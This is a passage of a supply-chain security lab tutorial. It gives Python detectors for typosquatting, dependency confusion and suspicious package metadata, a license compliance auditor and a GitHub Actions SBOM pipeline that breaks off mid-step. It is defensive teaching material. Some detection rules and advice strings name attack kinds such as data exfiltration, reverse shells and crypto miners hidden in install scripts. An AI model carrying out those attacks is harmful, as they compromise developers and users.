    "scope_squat": "Scope/namespace confusion (e.g., @meridian/lodash vs lodash)",
    "plural": "Plural/singular confusion (e.g., request → requests)",
    "combo_squat": "Combining known names (e.g., lodash-utils, express-helper)",
}


def string_similarity(a: str, b: str) -> float:
    """Calculate normalized string similarity using SequenceMatcher."""
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()


def check_char_distance(name: str, known: str) -> int:
    """Calculate Levenshtein-like edit distance."""
    if len(name) == 0:
        return len(known)
    if len(known) == 0:
        return len(name)

    matrix = [[0] * (len(known) + 1) for _ in range(len(name) + 1)]
    for i in range(len(name) + 1):
        matrix[i][0] = i
    for j in range(len(known) + 1):
        matrix[0][j] = j

    for i in range(1, len(name) + 1):
        for j in range(1, len(known) + 1):
            cost = 0 if name[i-1] == known[j-1] else 1
            matrix[i][j] = min(
                matrix[i-1][j] + 1,      # deletion
                matrix[i][j-1] + 1,       # insertion
                matrix[i-1][j-1] + cost,  # substitution
            )
    return matrix[len(name)][len(known)]


def detect_typosquats(sbom_path: str, threshold: float = 0.85) -> list[dict]:
    """Scan an SBOM for potential typosquatting packages."""
    with open(sbom_path) as f:
        data = json.load(f)

    findings = []

    for comp in data.get("components", []):
        name = comp.get("name", "")
        purl = comp.get("purl", "")

        # Determine ecosystem
        ecosystem = None
        if "pkg:npm/" in purl:
            ecosystem = "npm"
        elif "pkg:pypi/" in purl:
            ecosystem = "pypi"
        elif "pkg:maven/" in purl:
            ecosystem = "maven"

        if not ecosystem:
            continue

        known_packages = POPULAR_PACKAGES.get(ecosystem, [])

        # Skip if the package IS a known package
        if name.lower() in [p.lower() for p in known_packages]:
            continue

        # Check similarity against all known packages
        for known in known_packages:
            similarity = string_similarity(name, known)
            edit_dist = check_char_distance(name.lower(), known.lower())

            if similarity >= threshold and edit_dist > 0 and edit_dist <= 3:
                pattern = "unknown"
                if len(name) == len(known):
                    pattern = "char_swap" if edit_dist == 1 else "char_replace"
                elif len(name) < len(known):
                    pattern = "char_omit"
                elif len(name) > len(known):
                    pattern = "char_add"
                if "-" in name and "-" not in known:
                    pattern = "separator"

                findings.append({
                    "component": name,
                    "version": comp.get("version", "unknown"),
                    "similar_to": known,
                    "similarity": round(similarity, 4),
                    "edit_distance": edit_dist,
                    "pattern": pattern,
                    "pattern_desc": TYPOSQUAT_PATTERNS.get(pattern, "Unknown pattern"),
                    "risk": "HIGH" if similarity >= 0.90 else "MEDIUM",
                })

    return findings


def print_typosquat_report(findings: list[dict], sbom_name: str):
    """Display typosquatting analysis results."""
    print(f"\n{'='*70}")
    print(f"Typosquatting Analysis: {sbom_name}")
    print(f"{'='*70}")

    if not findings:
        print(f"  ✓ No typosquatting indicators detected.")
        return

    print(f"  ⚠ {len(findings)} potential typosquatting indicator(s) found!\n")

    for f in sorted(findings, key=lambda x: -x["similarity"]):
        risk_icon = "🔴" if f["risk"] == "HIGH" else "🟡"
        print(f"  [{f['risk']}] {f['component']}@{f['version']}")
        print(f"    Similar to:     {f['similar_to']}")
        print(f"    Similarity:     {f['similarity']:.2%}")
        print(f"    Edit distance:  {f['edit_distance']}")
        print(f"    Pattern:        {f['pattern_desc']}")
        print()

    print(f"  RECOMMENDATION: Manually verify each flagged package.")
    print(f"  Check npm/PyPI/Maven Central to confirm the package is legitimate.")
    print(f"  Review the package's GitHub repository, maintainer history, and download counts.")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python typosquat_detector.py <sbom-cdx.json> [...]")
        sys.exit(1)

    for path in sys.argv[1:]:
        findings = detect_typosquats(path)
        print_typosquat_report(findings, path)
TYPOSQUAT
chmod +x ~/lab31-sbom/scripts/typosquat_detector.py

Run:

python3 ~/lab31-sbom/scripts/typosquat_detector.py \
  sboms/web-portal-syft-cdx.json \
  sboms/data-pipeline-syft-cdx.json

Real-World Enhancement

In production, enhance this detector with:

Keyboard distance analysis — characters that are adjacent on QWERTY keyboards are common typos
Homoglyph detection — Unicode characters that look like ASCII (e.g., rеquests with Cyrillic е)
Historical name analysis — packages that were recently renamed or transferred ownership
Download count comparison — legitimate packages have orders of magnitude more downloads

4.2 — Dependency Confusion Detection¶

cat > ~/lab31-sbom/scripts/dep_confusion_detector.py << 'DEP_CONFUSION'
#!/usr/bin/env python3
"""
Dependency Confusion Detector — Identifies packages at risk of
dependency confusion attacks (internal names that could collide
with public registry packages).
Lab 31: SBOM Analysis & Supply Chain Security
"""

import json
import sys
import re


# ── Simulated internal package registry (nexus.internal.example.com) ──
INTERNAL_PACKAGES = {
    "npm": [
        "@meridian/auth-utils",
        "@meridian/config-loader",
        "@meridian/logging",
        "@meridian/crypto-helpers",
        "@meridian/rate-limiter",
        "meridian-common",
        "meridian-db-client",
        "meridian-queue-worker",
    ],
    "pypi": [
        "meridian-auth",
        "meridian-config",
        "meridian-utils",
        "meridian-data-models",
        "internal-crypto",
        "corp-logging",
    ],
    "maven": [
        "com.meridian:auth-service",
        "com.meridian:common-utils",
        "com.meridian:config-client",
        "com.meridian.internal:crypto",
    ],
}

# ── Indicators of dependency confusion risk ──
RISK_INDICATORS = {
    "no_scope": "Package lacks a scoped namespace (@org/pkg) — vulnerable to public squatting",
    "internal_prefix": "Package uses an internal naming convention that may not be reserved on public registry",
    "private_not_set": "Package.json does not set 'private: true' — npm publish could leak it",
    "no_registry_lock": "No .npmrc or pip.conf restricting package sources",
    "version_conflict": "Internal package version < public package version — pip/npm may prefer the public one",
}


def check_dependency_confusion(sbom_path: str) -> list[dict]:
    """Analyze SBOM components for dependency confusion risks."""
    with open(sbom_path) as f:
        data = json.load(f)

    findings = []

    for comp in data.get("components", []):
        name = comp.get("name", "")
        purl = comp.get("purl", "")
        version = comp.get("version", "unknown")

        risks = []

        # Check if it looks like an internal package
        internal_patterns = [
            r"^@meridian/",
            r"^meridian-",
            r"^internal-",
            r"^corp-",
            r"^com\.meridian",
        ]

        is_internal = any(re.match(p, name, re.IGNORECASE) for p in internal_patterns)

        if is_internal:
            # Check for scoping (npm)
            if "pkg:npm/" in purl and not name.startswith("@"):
                risks.append({
                    "indicator": "no_scope",
                    "detail": RISK_INDICATORS["no_scope"],
                    "severity": "HIGH",
                    "recommendation": f"Rename '{name}' to '@meridian/{name}' and reserve the scoped name on npmjs.com",
                })

            # Check naming convention
            risks.append({
                "indicator": "internal_prefix",
                "detail": RISK_INDICATORS["internal_prefix"],
                "severity": "MEDIUM",
                "recommendation": f"Register '{name}' as a placeholder on the public registry to prevent squatting",
            })

        if risks:
            findings.append({
                "component": name,
                "version": version,
                "purl": purl,
                "is_internal": is_internal,
                "risks": risks,
            })

    return findings


def print_confusion_report(findings: list[dict], sbom_name: str):
    """Display dependency confusion analysis results."""
    print(f"\n{'='*70}")
    print(f"Dependency Confusion Analysis: {sbom_name}")
    print(f"{'='*70}")

    if not findings:
        print(f"  ✓ No dependency confusion risks detected.")
        print(f"  NOTE: Ensure .npmrc / pip.conf restricts package sources.")
        return

    print(f"  ⚠ {len(findings)} component(s) with dependency confusion risk\n")

    for f in findings:
        print(f"  Component: {f['component']}@{f['version']}")
        print(f"  PURL:      {f['purl']}")
        for risk in f["risks"]:
            print(f"    [{risk['severity']}] {risk['indicator']}")
            print(f"      {risk['detail']}")
            print(f"      Fix: {risk['recommendation']}")
        print()

    print(f"  --- Mitigation Checklist ---")
    print(f"  [ ] Reserve internal package names on public registries")
    print(f"  [ ] Use scoped packages (@org/pkg) for all internal npm packages")
    print(f"  [ ] Configure .npmrc with registry=https://nexus.internal.example.com/npm/")
    print(f"  [ ] Configure pip.conf with --index-url https://nexus.internal.example.com/pypi/simple/")
    print(f"  [ ] Set 'private: true' in all internal package.json files")
    print(f"  [ ] Use Maven settings.xml to restrict repository sources")
    print(f"  [ ] Enable Artifactory/Nexus 'exclude' rules for internal namespaces on remote repos")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python dep_confusion_detector.py <sbom-cdx.json> [...]")
        sys.exit(1)

    for path in sys.argv[1:]:
        findings = check_dependency_confusion(path)
        print_confusion_report(findings, path)
DEP_CONFUSION
chmod +x ~/lab31-sbom/scripts/dep_confusion_detector.py

4.3 — Package Metadata Anomaly Detection¶

cat > ~/lab31-sbom/scripts/metadata_anomaly.py << 'METADATA'
#!/usr/bin/env python3
"""
Package Metadata Anomaly Detector — Identifies suspicious metadata patterns
that may indicate a compromised or malicious package.
Lab 31: SBOM Analysis & Supply Chain Security

Detection patterns inspired by Phylum and Socket.dev research.
"""

import json
import sys
from datetime import datetime, timedelta
from dataclasses import dataclass


@dataclass
class MetadataAnomaly:
    component: str
    version: str
    anomaly_type: str
    severity: str
    detail: str
    recommendation: str


# ── Synthetic package metadata (simulates registry API responses) ──
PACKAGE_METADATA = {
    "express": {
        "first_published": "2010-12-29",
        "latest_publish": "2024-03-25",
        "maintainer_count": 3,
        "maintainer_changes_90d": 0,
        "weekly_downloads": 32000000,
        "has_install_scripts": False,
        "repo_url": "https://github.com/expressjs/express",
        "repo_stars": 64000,
        "license": "MIT",
        "deprecated": False,
    },
    "lodash": {
        "first_published": "2012-04-12",
        "latest_publish": "2021-02-20",
        "maintainer_count": 2,
        "maintainer_changes_90d": 0,
        "weekly_downloads": 52000000,
        "has_install_scripts": False,
        "repo_url": "https://github.com/lodash/lodash",
        "repo_stars": 59000,
        "license": "MIT",
        "deprecated": False,
    },
    "synth-suspicious-pkg": {
        "first_published": "2026-04-10",
        "latest_publish": "2026-04-11",
        "maintainer_count": 1,
        "maintainer_changes_90d": 1,
        "weekly_downloads": 47,
        "has_install_scripts": True,
        "repo_url": "",
        "repo_stars": 0,
        "license": "NOASSERTION",
        "deprecated": False,
    },
    "synth-hijacked-pkg": {
        "first_published": "2020-06-15",
        "latest_publish": "2026-04-08",
        "maintainer_count": 1,
        "maintainer_changes_90d": 2,
        "weekly_downloads": 1200,
        "has_install_scripts": True,
        "repo_url": "https://github.internal.example.com/unknown-user/hijacked-pkg",
        "repo_stars": 3,
        "license": "MIT",
        "deprecated": False,
    },
}


def check_anomalies(pkg_name: str, metadata: dict) -> list[MetadataAnomaly]:
    """Check package metadata for suspicious patterns."""
    anomalies = []
    today = datetime(2026, 4, 12)

    # 1. Recently published package (< 30 days old)
    first_pub = datetime.strptime(metadata["first_published"], "%Y-%m-%d")
    age_days = (today - first_pub).days
    if age_days < 30:
        anomalies.append(MetadataAnomaly(
            component=pkg_name,
            version="*",
            anomaly_type="NEW_PACKAGE",
            severity="HIGH",
            detail=f"Package is only {age_days} days old (first published: {metadata['first_published']})",
            recommendation="Manually review package source code before use. New packages are high-risk for supply chain attacks.",
        ))

    # 2. Low download count
    if metadata["weekly_downloads"] < 100:
        anomalies.append(MetadataAnomaly(
            component=pkg_name,
            version="*",
            anomaly_type="LOW_POPULARITY",
            severity="MEDIUM",
            detail=f"Weekly downloads: {metadata['weekly_downloads']} (threshold: 100)",
            recommendation="Low-download packages are more likely to be malicious. Verify the package serves a legitimate purpose.",
        ))

    # 3. Maintainer changes in last 90 days
    if metadata["maintainer_changes_90d"] > 0:
        anomalies.append(MetadataAnomaly(
            component=pkg_name,
            version="*",
            anomaly_type="MAINTAINER_CHANGE",
            severity="HIGH",
            detail=f"Maintainer changed {metadata['maintainer_changes_90d']} time(s) in the last 90 days",
            recommendation="Account takeover is a common supply chain vector. Verify the new maintainer is legitimate.",
        ))

    # 4. Install scripts present
    if metadata["has_install_scripts"]:
        anomalies.append(MetadataAnomaly(
            component=pkg_name,
            version="*",
            anomaly_type="INSTALL_SCRIPTS",
            severity="HIGH",
            detail="Package contains install scripts (preinstall/postinstall hooks)",
            recommendation="Install scripts execute arbitrary code during 'npm install'. Review the scripts for malicious behavior (data exfiltration, reverse shells, crypto miners).",
        ))

    # 5. No repository URL
    if not metadata["repo_url"]:
        anomalies.append(MetadataAnomaly(
            component=pkg_name,
            version="*",
            anomaly_type="NO_REPOSITORY",
            severity="MEDIUM",
            detail="No source code repository linked",
            recommendation="Packages without linked repositories cannot be audited. Avoid using packages with no verifiable source.",
        ))

    # 6. No license declared
    if metadata["license"] in ["NOASSERTION", "", None]:
        anomalies.append(MetadataAnomaly(
            component=pkg_name,
            version="*",
            anomaly_type="NO_LICENSE",
            severity="LOW",
            detail="No license declared",
            recommendation="Packages without licenses have undefined usage rights and may indicate a throwaway/malicious package.",
        ))

    # 7. Single maintainer
    if metadata["maintainer_count"] <= 1:
        anomalies.append(MetadataAnomaly(
            component=pkg_name,
            version="*",
            anomaly_type="SINGLE_MAINTAINER",
            severity="LOW",
            detail="Package has a single maintainer (bus factor = 1)",
            recommendation="Single-maintainer packages are high-risk for account takeover. Consider pinning versions and monitoring for unexpected updates.",
        ))

    return anomalies


def analyze_sbom_metadata(sbom_path: str) -> list[MetadataAnomaly]:
    """Analyze all components in an SBOM for metadata anomalies."""
    with open(sbom_path) as f:
        data = json.load(f)

    all_anomalies = []
    for comp in data.get("components", []):
        name = comp.get("name", "")
        if name in PACKAGE_METADATA:
            anomalies = check_anomalies(name, PACKAGE_METADATA[name])
            all_anomalies.extend(anomalies)

    return all_anomalies


def print_anomaly_report(anomalies: list[MetadataAnomaly], sbom_name: str):
    """Display metadata anomaly findings."""
    print(f"\n{'='*70}")
    print(f"Package Metadata Anomaly Report: {sbom_name}")
    print(f"{'='*70}")

    if not anomalies:
        print(f"  ✓ No metadata anomalies detected.")
        return

    print(f"  {len(anomalies)} anomaly/anomalies detected\n")

    severity_order = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}
    for a in sorted(anomalies, key=lambda x: severity_order.get(x.severity, 99)):
        icon = {"HIGH": "🔴", "MEDIUM": "🟡", "LOW": "🔵"}.get(a.severity, "⚪")
        print(f"  [{a.severity}] {a.anomaly_type} — {a.component}")
        print(f"    {a.detail}")
        print(f"    Action: {a.recommendation}")
        print()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        # Demo mode with synthetic data
        print("Running in demo mode with synthetic package metadata...")
        for pkg_name, metadata in PACKAGE_METADATA.items():
            anomalies = check_anomalies(pkg_name, metadata)
            if anomalies:
                print(f"\n--- {pkg_name} ---")
                for a in anomalies:
                    print(f"  [{a.severity}] {a.anomaly_type}: {a.detail}")
    else:
        for path in sys.argv[1:]:
            anomalies = analyze_sbom_metadata(path)
            print_anomaly_report(anomalies, path)
METADATA
chmod +x ~/lab31-sbom/scripts/metadata_anomaly.py

Run in demo mode:

python3 ~/lab31-sbom/scripts/metadata_anomaly.py

Expected output:

Running in demo mode with synthetic package metadata...

--- synth-suspicious-pkg ---
  [HIGH] NEW_PACKAGE: Package is only 2 days old (first published: 2026-04-10)
  [HIGH] MAINTAINER_CHANGE: Maintainer changed 1 time(s) in the last 90 days
  [HIGH] INSTALL_SCRIPTS: Package contains install scripts (preinstall/postinstall hooks)
  [MEDIUM] LOW_POPULARITY: Weekly downloads: 47 (threshold: 100)
  [MEDIUM] NO_REPOSITORY: No source code repository linked
  [LOW] NO_LICENSE: No license declared
  [LOW] SINGLE_MAINTAINER: Package has a single maintainer (bus factor = 1)

--- synth-hijacked-pkg ---
  [HIGH] MAINTAINER_CHANGE: Maintainer changed 2 time(s) in the last 90 days
  [HIGH] INSTALL_SCRIPTS: Package contains install scripts (preinstall/postinstall hooks)
  [LOW] SINGLE_MAINTAINER: Package has a single maintainer (bus factor = 1)

Production Enhancements

For real-world deployment, integrate with:

Socket.dev API — real-time package risk scoring with install script analysis
Phylum CLI — automated package analysis in CI/CD
npm audit signatures — verify package provenance via Sigstore
pip-audit — Python-specific vulnerability and metadata analysis
Snyk Advisor — package health scoring across ecosystems

Phase 5: License Compliance¶

Objective¶

Extract license information from SBOMs, identify copyleft vs permissive licenses, detect conflicts, and build a compliance matrix.

5.1 — License Extraction and Classification¶

cat > ~/lab31-sbom/scripts/license_audit.py << 'LICENSE_AUDIT'
#!/usr/bin/env python3
"""
License Compliance Auditor — Extracts and classifies licenses from SBOMs,
detects conflicts, and generates compliance reports.
Lab 31: SBOM Analysis & Supply Chain Security
"""

import json
import sys
from dataclasses import dataclass, field
from enum import Enum


class LicenseCategory(Enum):
    PERMISSIVE = "permissive"
    WEAK_COPYLEFT = "weak-copyleft"
    STRONG_COPYLEFT = "strong-copyleft"
    COMMERCIAL = "commercial"
    PUBLIC_DOMAIN = "public-domain"
    UNKNOWN = "unknown"
    PROHIBITED = "prohibited"


# ── License classification database ──
LICENSE_DB = {
    # Permissive licenses
    "MIT": LicenseCategory.PERMISSIVE,
    "Apache-2.0": LicenseCategory.PERMISSIVE,
    "BSD-2-Clause": LicenseCategory.PERMISSIVE,
    "BSD-3-Clause": LicenseCategory.PERMISSIVE,
    "ISC": LicenseCategory.PERMISSIVE,
    "0BSD": LicenseCategory.PERMISSIVE,
    "Unlicense": LicenseCategory.PUBLIC_DOMAIN,
    "CC0-1.0": LicenseCategory.PUBLIC_DOMAIN,
    "WTFPL": LicenseCategory.PERMISSIVE,
    "Zlib": LicenseCategory.PERMISSIVE,

    # Weak copyleft
    "LGPL-2.0-only": LicenseCategory.WEAK_COPYLEFT,
    "LGPL-2.1-only": LicenseCategory.WEAK_COPYLEFT,
    "LGPL-3.0-only": LicenseCategory.WEAK_COPYLEFT,
    "MPL-2.0": LicenseCategory.WEAK_COPYLEFT,
    "EPL-2.0": LicenseCategory.WEAK_COPYLEFT,
    "CDDL-1.0": LicenseCategory.WEAK_COPYLEFT,

    # Strong copyleft
    "GPL-2.0-only": LicenseCategory.STRONG_COPYLEFT,
    "GPL-3.0-only": LicenseCategory.STRONG_COPYLEFT,
    "AGPL-3.0-only": LicenseCategory.STRONG_COPYLEFT,

    # Prohibited (example enterprise policy)
    "SSPL-1.0": LicenseCategory.PROHIBITED,
    "Commons-Clause": LicenseCategory.PROHIBITED,
}

# ── Enterprise license policy ──
ENTERPRISE_POLICY = {
    "allowed": [
        LicenseCategory.PERMISSIVE,
        LicenseCategory.PUBLIC_DOMAIN,
    ],
    "review_required": [
        LicenseCategory.WEAK_COPYLEFT,
    ],
    "prohibited": [
        LicenseCategory.STRONG_COPYLEFT,
        LicenseCategory.PROHIBITED,
    ],
    "unknown_action": "BLOCK",  # BLOCK or REVIEW
}


@dataclass
class LicenseResult:
    component: str
    version: str
    license_id: str
    category: LicenseCategory
    policy_status: str  # ALLOWED, REVIEW, PROHIBITED, UNKNOWN
    detail: str = ""


def classify_license(license_id: str) -> LicenseCategory:
    """Classify a license identifier into a category."""
    if not license_id or license_id in ["NOASSERTION", "NONE", ""]:
        return LicenseCategory.UNKNOWN

    # Normalize common variations
    normalized = license_id.strip()
    if normalized in LICENSE_DB:
        return LICENSE_DB[normalized]

    # Try without -only/-or-later suffix
    for suffix in ["-only", "-or-later"]:
        if normalized.endswith(suffix):
            base = normalized[:-len(suffix)]
            if base in LICENSE_DB:
                return LICENSE_DB[base]

    return LicenseCategory.UNKNOWN


def check_policy(category: LicenseCategory) -> str:
    """Check license category against enterprise policy."""
    if category in ENTERPRISE_POLICY["allowed"]:
        return "ALLOWED"
    elif category in ENTERPRISE_POLICY["review_required"]:
        return "REVIEW"
    elif category in ENTERPRISE_POLICY["prohibited"]:
        return "PROHIBITED"
    else:
        return "UNKNOWN"


def audit_sbom_licenses(sbom_path: str) -> list[LicenseResult]:
    """Extract and classify all licenses from a CycloneDX SBOM."""
    with open(sbom_path) as f:
        data = json.load(f)

    results = []
    for comp in data.get("components", []):
        name = comp.get("name", "UNKNOWN")
        version = comp.get("version", "UNKNOWN")

        licenses = []
        for lic in comp.get("licenses", []):
            if "license" in lic:
                license_id = lic["license"].get("id", lic["license"].get("name", "NOASSERTION"))
                licenses.append(license_id)
            elif "expression" in lic:
                licenses.append(lic["expression"])

        if not licenses:
            licenses = ["NOASSERTION"]

        for license_id in licenses:
            category = classify_license(license_id)
            policy_status = check_policy(category)

            detail = ""
            if policy_status == "PROHIBITED":
                detail = f"License '{license_id}' is PROHIBITED by enterprise policy. Remove this dependency or obtain legal exception."
            elif policy_status == "REVIEW":
                detail = f"License '{license_id}' requires legal review before use in commercial products."
            elif policy_status == "UNKNOWN":
                detail = f"License '{license_id}' is not in the classification database. Manual review required."

            results.append(LicenseResult(
                component=name,
                version=version,
                license_id=license_id,
                category=category,
                policy_status=policy_status,
                detail=detail,
            ))

    return results


def print_license_report(results: list[LicenseResult], sbom_name: str):
    """Generate a formatted license compliance report."""
    print(f"\n{'='*70}")
    print(f"License Compliance Report: {sbom_name}")
    print(f"{'='*70}")
    print(f"Total components analyzed: {len(results)}")

    # Category breakdown
    category_counts = {}
    for r in results:
        cat = r.category.value
        category_counts[cat] = category_counts.get(cat, 0) + 1

    print(f"\nLicense Category Distribution:")
    for cat, count in sorted(category_counts.items()):
        bar = "█" * count
        print(f"  {cat:<20} {count:>3}  {bar}")

    # Policy compliance summary
    policy_counts = {}
    for r in results:
        policy_counts[r.policy_status] = policy_counts.get(r.policy_status, 0) + 1

    print(f"\nPolicy Compliance:")
    status_icons = {"ALLOWED": "✓", "REVIEW": "⚠", "PROHIBITED": "✗", "UNKNOWN": "?"}
    for status in ["ALLOWED", "REVIEW", "PROHIBITED", "UNKNOWN"]:
        count = policy_counts.get(status, 0)
        icon = status_icons.get(status, " ")
        print(f"  {icon} {status:<12} {count:>3}")

    # Detailed findings for non-ALLOWED
    issues = [r for r in results if r.policy_status != "ALLOWED"]
    if issues:
        print(f"\n--- Action Items ---")
        for r in sorted(issues, key=lambda x: {"PROHIBITED": 0, "UNKNOWN": 1, "REVIEW": 2}.get(x.policy_status, 99)):
            icon = {"PROHIBITED": "🔴", "UNKNOWN": "🟡", "REVIEW": "🔵"}.get(r.policy_status, "⚪")
            print(f"\n  [{r.policy_status}] {r.component}@{r.version}")
            print(f"    License:  {r.license_id} ({r.category.value})")
            if r.detail:
                print(f"    Action:   {r.detail}")
    else:
        print(f"\n  ✓ All components comply with enterprise license policy.")

    # Compliance matrix
    print(f"\n--- Compliance Matrix ---")
    print(f"  {'Component':<30} {'Version':<12} {'License':<20} {'Category':<18} {'Status':<12}")
    print(f"  {'-'*30} {'-'*12} {'-'*20} {'-'*18} {'-'*12}")
    for r in sorted(results, key=lambda x: x.component):
        status_marker = {"ALLOWED": "  ", "REVIEW": "⚠ ", "PROHIBITED": "✗ ", "UNKNOWN": "? "}.get(r.policy_status, "  ")
        print(f"  {status_marker}{r.component:<28} {r.version:<12} {r.license_id:<20} {r.category.value:<18} {r.policy_status:<12}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python license_audit.py <sbom-cdx.json> [...]")
        sys.exit(1)

    all_results = []
    for path in sys.argv[1:]:
        results = audit_sbom_licenses(path)
        print_license_report(results, path)
        all_results.extend(results)

    # Cross-application summary
    if len(sys.argv) > 2:
        print(f"\n{'='*70}")
        print(f"AGGREGATE LICENSE COMPLIANCE SUMMARY")
        print(f"{'='*70}")
        total = len(all_results)
        prohibited = sum(1 for r in all_results if r.policy_status == "PROHIBITED")
        review = sum(1 for r in all_results if r.policy_status == "REVIEW")
        unknown = sum(1 for r in all_results if r.policy_status == "UNKNOWN")
        allowed = sum(1 for r in all_results if r.policy_status == "ALLOWED")

        compliance_rate = allowed / total * 100 if total > 0 else 0
        print(f"Total components: {total}")
        print(f"Compliance rate:  {compliance_rate:.1f}%")
        print(f"Blocked:          {prohibited}")
        print(f"Review needed:    {review}")
        print(f"Unclassified:     {unknown}")

        if prohibited > 0:
            print(f"\n⚠ {prohibited} component(s) use PROHIBITED licenses.")
            print(f"  These MUST be removed or replaced before release.")
LICENSE_AUDIT
chmod +x ~/lab31-sbom/scripts/license_audit.py

Run:

cd ~/lab31-sbom && python3 scripts/license_audit.py \
  sboms/web-portal-syft-cdx.json \
  sboms/data-pipeline-syft-cdx.json \
  sboms/api-gateway-syft-cdx.json

Expected output (web portal excerpt):

======================================================================
License Compliance Report: sboms/web-portal-syft-cdx.json
======================================================================
Total components analyzed: 26

License Category Distribution:
  permissive             22  ██████████████████████
  unknown                 3  ███
  public-domain           1  █

Policy Compliance:
  ✓ ALLOWED       23
  ⚠ REVIEW         0
  ✗ PROHIBITED     0
  ? UNKNOWN         3

--- Action Items ---

  [UNKNOWN] swagger-ui-express@5.0.0
    License:  NOASSERTION (unknown)
    Action:   License 'NOASSERTION' is not in the classification database. Manual review required.
  ...

5.2 — License Conflict Detection¶

Common License Conflicts

Combination	Conflict?	Explanation
MIT + Apache-2.0	No	Both permissive, compatible
MIT + GPL-3.0	Yes (if distributing)	GPL requires derivative works to be GPL
Apache-2.0 + GPL-2.0	Yes	Apache-2.0 patent clause incompatible with GPL-2.0
LGPL-2.1 + MIT	No (if dynamically linked)	LGPL allows linking with permissive code
AGPL-3.0 + anything proprietary	Yes	AGPL requires source disclosure for network use
BSD-3-Clause + MIT	No	Both permissive

When your SBOM includes components with conflicting licenses, you must either:

Replace the conflicting component with a compatible alternative
Obtain a commercial license exception from the copyright holder
Restructure the application to isolate GPL-licensed components (e.g., separate microservice)

Phase 6: CI/CD Integration¶

Objective¶

Integrate SBOM generation, vulnerability scanning, attestation, and VEX document creation into an automated CI/CD pipeline.

6.1 — GitHub Actions SBOM Pipeline¶

cat > ~/lab31-sbom/ci/sbom-pipeline.yml << 'PIPELINE'
# .github/workflows/sbom-pipeline.yml
# SBOM Generation, Scanning, and Attestation Pipeline
# Meridian Software Corp — internal.example.com
# Auth: testuser / REDACTED

name: SBOM Pipeline

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]
  schedule:
    # Weekly rescan for new vulnerabilities
    - cron: '0 6 * * 1'

permissions:
  contents: read
  security-events: write
  id-token: write  # Required for Sigstore cosign
  packages: write
  attestations: write

env:
  REGISTRY: registry.internal.example.com
  SBOM_SERVER: https://sbom-server.internal.example.com
  NVD_API_KEY: ${{ secrets.NVD_API_KEY }}

jobs:
  # ── Stage 1: Generate SBOMs ──
  generate-sbom:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        app:
          - name: meridian-web-portal
            path: apps/meridian-web-portal
            type: node
          - name: meridian-data-pipeline
            path: apps/meridian-data-pipeline
            type: python
          - name: meridian-api-gateway
            path: apps/meridian-api-gateway
            type: java
    steps:
      - uses: actions/checkout@v4

      - name: Install Syft
        uses: anchore/sbom-action/download-syft@v0

      - name: Generate CycloneDX SBOM
        run: |
          syft scan dir:${{ matrix.app.path }} \
            --output cyclonedx-json=sbom-${{ matrix.app.name }}-cdx.json \
            --name "${{ matrix.app.name }}" \
            --version "${{ github.sha }}"

      - name: Generate SPDX SBOM
        run: |
          syft scan dir:${{ matrix.app.path }} \
            --output spdx-json=sbom-${{ matrix.app.name }}-spdx.json \
            --name "${{ matrix.app.name }}" \
            --version "${{ github.sha }}"

      - name: Upload SBOM Artifacts
        uses: actions/upload-artifact@v4
        with:
          name: sbom-${{ matrix.app.name }}
          path: |
            sbom-${{ matrix.app.name }}-cdx.json
            sbom-${{ matrix.app.name }}-spdx.json

  # ── Stage 2: Vulnerability Scan ──
  vulnerability-scan:
    needs: generate-sbom
    runs-on: ubuntu-latest
    strategy:
      matrix:
        app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
    steps:
      - name: Download SBOM
        uses: actions/download-artifact@v4
        with:
          name: sbom-${{ matrix.app }}

      - name: Install Grype
        uses: anchore/scan-action/download-grype@v4

      - name: Scan for Vulnerabilities
        run: |
          grype sbom:sbom-${{ matrix.app }}-cdx.json \
            --output json \
            --file vuln-report-${{ matrix.app }}.json \
            --fail-on critical

      - name: Upload Vulnerability Report
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: vuln-${{ matrix.app }}
          path: vuln-report-${{ matrix.app }}.json

      - name: Upload SARIF to GitHub Security
        if: always()
        run: |
          grype sbom:sbom-${{ matrix.app }}-cdx.json \
            --output sarif \
            --file vuln-${{ matrix.app }}.sarif

      - name: Upload SARIF
        if: always()
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: vuln-${{ matrix.app }}.sarif
          category: sbom-${{ matrix.app }}

  # ── Stage 3: License Compliance ──
  license-check:
    needs: generate-sbom
    runs-on: ubuntu-latest
    strategy:
      matrix:
        app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
    steps:
      - uses: actions/checkout@v4

      - name: Download SBOM
        uses: actions/download-artifact@v4
        with:
          name: sbom-${{ matrix.app }}

      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: '3.11'

      - name: Run License Audit
        run: |
          python scripts/license_audit.py sbom-${{ matrix.app }}-cdx.json \
            | tee license-report-${{ matrix.app }}.txt

      - name: Check for Prohibited Licenses
        run: |
          if grep -q "PROHIBITED" license-report-${{ matrix.app }}.txt; then
            echo "::error::Prohibited license detected in ${{ matrix.app }}"
            exit 1
          fi

  # ── Stage 4: SBOM Attestation with Sigstore ──
  attest:
    needs: [vulnerability-scan, license-check]
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/main'
    strategy:
      matrix:
        app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
    steps:
      - name: Download SBOM
        uses: actions/download-artifact@v4
        with:
          name: sbom-${{ matrix.app }}

      - name: Install cosign
        uses: sigstore/cosign-installer@v3

      - name: Sign SBOM with Sigstore (Keyless)
        run: |
          cosign attest-blob \
            --predicate sbom-${{ matrix.app }}-cdx.json \
            --type cyclonedx \
            --bundle sbom-${{ matrix.app }}-attestation.json \
            --yes

      - name: Upload Attestation
        uses: actions/upload-artifact@v4
        with:
          name: attestation-${{ matrix.app }}
          path: sbom-${{ matrix.app }}-attestation.json

      - name: Publish SBOM to SBOM Server
        run: |
          echo "Publishing SBOM to ${SBOM_SERVER}/api/v1/sbom"
          # curl -X POST "${SBOM_SERVER}/api/v1/sbom" \
          #   -H "Authorization: Bearer ${SBOM_TOKEN}" \
          #   -H "Content-Type: application/json" \
